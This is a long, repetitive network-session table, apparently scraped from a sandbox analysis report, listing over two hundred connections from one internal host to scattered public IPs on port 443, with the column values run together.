                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12375192.168.2.235450057.226.73.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12376192.168.2.235168262.232.7.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12377192.168.2.234325858.67.31.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12378192.168.2.2334816149.3.19.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12379192.168.2.2339900151.49.247.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12380192.168.2.2347008133.77.180.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12381192.168.2.2352866154.114.156.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12382192.168.2.235525224.23.254.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12383192.168.2.2360778198.167.200.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12384192.168.2.235263267.120.71.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12385192.168.2.235646851.194.96.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12386192.168.2.235566049.128.138.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12387192.168.2.23561785.25.104.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12388192.168.2.233973835.147.242.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12389192.168.2.2352350115.145.149.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12390192.168.2.2340440189.215.107.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12391192.168.2.2356286137.250.156.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12392192.168.2.234763477.235.150.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12393192.168.2.2334050164.20.48.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12394192.168.2.2333818199.90.159.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12395192.168.2.2350312129.170.56.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12396192.168.2.2353370152.55.134.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12397192.168.2.233868284.108.59.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12398192.168.2.2354970195.244.34.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12399192.168.2.2360988134.240.119.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12400192.168.2.2337350110.148.152.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12401192.168.2.2352394145.77.218.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12402192.168.2.2334206209.181.179.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12403192.168.2.2353822184.119.218.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12404192.168.2.2348206110.187.53.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12405192.168.2.235266840.228.111.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12406192.168.2.2342026176.253.167.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12407192.168.2.234002825.225.30.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12408192.168.2.234756484.239.66.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12409192.168.2.2353272205.217.186.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12410192.168.2.2353464154.119.102.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12411192.168.2.234023813.48.123.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12412192.168.2.233926685.173.236.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12413192.168.2.2343966176.119.179.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12414192.168.2.234756684.123.124.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12415192.168.2.2335100183.44.38.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12416192.168.2.23437821.112.216.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12417192.168.2.2351958109.160.209.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12418192.168.2.233978676.45.33.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12419192.168.2.2345618173.25.179.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12420192.168.2.2354718179.71.221.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12421192.168.2.236097036.244.197.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12422192.168.2.2339434143.23.254.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12423192.168.2.2352458191.214.36.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12424192.168.2.235719482.16.185.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12425192.168.2.233727699.72.196.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12426192.168.2.234313845.174.221.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12427192.168.2.2352072195.212.58.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12428192.168.2.2351156121.140.184.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12429192.168.2.2337234112.199.32.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12430192.168.2.2334196209.68.81.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12431192.168.2.2341566199.250.143.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12432192.168.2.235915651.58.30.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12433192.168.2.235709246.207.89.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12434192.168.2.234927279.160.96.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12435192.168.2.2357466205.3.168.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12436192.168.2.2347386169.195.161.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12437192.168.2.234948666.78.196.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12438192.168.2.2351614110.62.200.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12439192.168.2.234664214.34.124.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12440192.168.2.234813888.108.40.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12441192.168.2.2356336130.195.252.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12442192.168.2.2354892131.103.95.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12443192.168.2.2353964187.151.54.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12444192.168.2.234819288.6.211.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12445192.168.2.2335656111.94.75.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12446192.168.2.2358996175.235.90.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12447192.168.2.2350796133.229.203.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12448192.168.2.2333328162.12.195.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12449192.168.2.2360316131.27.234.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12450192.168.2.2344356122.252.72.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12451192.168.2.2334126130.106.103.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12452192.168.2.233506462.12.231.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12453192.168.2.235832693.27.104.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12454192.168.2.2335418198.51.201.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12455192.168.2.233542840.74.44.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12456192.168.2.234535089.75.12.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12457192.168.2.234509265.222.242.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12458192.168.2.2339436219.162.242.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12459192.168.2.2345464122.104.183.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12460192.168.2.2358700222.44.101.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12461192.168.2.2348580154.104.168.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12462192.168.2.2335960185.47.0.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12463192.168.2.2343562195.162.134.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12464192.168.2.2335520120.44.154.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12465192.168.2.2336246113.84.89.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12466192.168.2.235650297.115.216.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12467192.168.2.235252299.59.77.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12468192.168.2.23395948.227.182.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12469192.168.2.2337192207.87.251.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12470192.168.2.2350828154.44.183.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12471192.168.2.2343438202.162.55.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12472192.168.2.233368678.122.54.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12473192.168.2.2344344110.81.142.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12474192.168.2.2337524180.186.102.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12475192.168.2.233818047.21.59.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12476192.168.2.2339528110.23.34.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12477192.168.2.235254634.18.236.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12478192.168.2.2352588156.31.124.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12479192.168.2.2349842150.99.90.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12480192.168.2.2333214212.57.140.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12481192.168.2.2349064116.134.243.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12482192.168.2.234099099.215.103.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12483192.168.2.2347590116.31.228.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12484192.168.2.2333868169.134.181.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12485192.168.2.2335192110.185.161.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12486192.168.2.2351896190.216.98.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12487192.168.2.2335936190.140.202.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12488192.168.2.2341462164.172.61.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12489192.168.2.233737459.40.95.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12490192.168.2.234061846.84.130.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12491192.168.2.2341728179.33.113.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12492192.168.2.2347894137.153.122.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12493192.168.2.234341292.233.204.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12494192.168.2.2347838144.128.184.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12495192.168.2.235867287.103.84.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12496192.168.2.236088048.121.188.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12497192.168.2.233993454.91.41.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12498192.168.2.233684681.215.107.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12499192.168.2.2348262197.176.61.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12500192.168.2.2342716118.231.31.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12501192.168.2.233644864.239.188.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12502192.168.2.233662625.251.148.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12503192.168.2.2358870112.33.180.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12504192.168.2.2346744153.191.226.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12505192.168.2.2356680170.173.196.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12506192.168.2.2341894136.33.228.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12507192.168.2.2332820160.131.35.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12508192.168.2.2339964147.70.211.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12509192.168.2.2353608190.50.203.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12510192.168.2.2342502133.5.57.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12511192.168.2.2332912116.47.114.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12512192.168.2.2344166160.35.22.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12513192.168.2.2354446106.56.26.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12514192.168.2.234550095.253.252.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12515192.168.2.2350436150.5.197.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12516192.168.2.234999085.78.241.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12517192.168.2.2344166103.186.108.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12518192.168.2.2356600219.83.111.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12519192.168.2.2354234180.66.145.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12520192.168.2.2358320218.87.107.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12521192.168.2.2351062175.129.176.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12522192.168.2.234420049.154.164.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12523192.168.2.2359630117.44.114.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12524192.168.2.2352422149.136.177.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12525192.168.2.2335520110.99.232.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12526192.168.2.235114087.202.170.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12527192.168.2.234667040.27.96.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12528192.168.2.234179032.141.86.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12529192.168.2.235812663.228.183.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12530192.168.2.2358778102.246.157.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12531192.168.2.2359310104.180.102.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12532192.168.2.2349066169.183.29.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12533192.168.2.2336978218.80.178.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12534192.168.2.233799661.48.192.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12535192.168.2.2333984221.192.165.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12536192.168.2.23576689.73.243.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12537192.168.2.235898040.43.218.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12538192.168.2.234921062.129.204.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12539192.168.2.2334330191.196.29.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12540192.168.2.233861294.45.50.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12541192.168.2.2360746140.79.215.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12542192.168.2.235647047.237.102.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12543192.168.2.2353788218.131.148.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12544192.168.2.2352454124.213.60.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12545192.168.2.2335370209.238.151.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12546192.168.2.233284891.46.171.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12547192.168.2.2335792211.175.4.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12548192.168.2.2336266196.150.244.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12549192.168.2.233852012.39.43.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12550192.168.2.2350436223.232.111.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12551192.168.2.234170661.192.105.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12552192.168.2.235987617.124.195.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12553192.168.2.234133451.6.74.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12554192.168.2.2354700171.252.247.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12555192.168.2.235079048.142.171.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12556192.168.2.2359788117.140.160.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12557192.168.2.2350550121.7.182.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12558192.168.2.2340596111.252.170.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12559192.168.2.2355978204.1.130.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12560192.168.2.2348102145.185.32.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12561192.168.2.235190458.224.208.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12562192.168.2.23488041.56.237.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12563192.168.2.2335158194.46.189.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12564192.168.2.2352400111.251.168.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12565192.168.2.2351440119.119.182.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12566192.168.2.235378049.105.217.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12567192.168.2.2335528206.163.8.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12568192.168.2.2333446164.203.115.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12569192.168.2.2360156220.106.116.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12570192.168.2.2339926196.183.255.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12571192.168.2.2354458189.242.144.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12572192.168.2.2354138143.105.119.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12573192.168.2.2338126184.24.34.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12574192.168.2.234024243.128.50.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12575192.168.2.233350052.16.123.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12576192.168.2.2352622157.250.0.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12577192.168.2.233920481.28.152.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12578192.168.2.23498242.106.31.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12579192.168.2.234314089.106.164.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12580192.168.2.233543043.244.85.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12581192.168.2.234083634.22.145.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12582192.168.2.234677861.145.120.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12583192.168.2.2358870150.196.1.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12584192.168.2.233800668.13.35.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12585192.168.2.236002623.46.152.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12586192.168.2.2333180219.187.106.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12587192.168.2.2337138156.35.116.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12588192.168.2.2352246150.198.32.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12589192.168.2.234023047.200.147.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12590192.168.2.236050089.152.175.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12591192.168.2.2347542195.156.123.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12592192.168.2.2339020198.236.27.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12593192.168.2.2336522155.219.229.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12594192.168.2.2347006155.163.120.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12595192.168.2.234800051.231.118.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
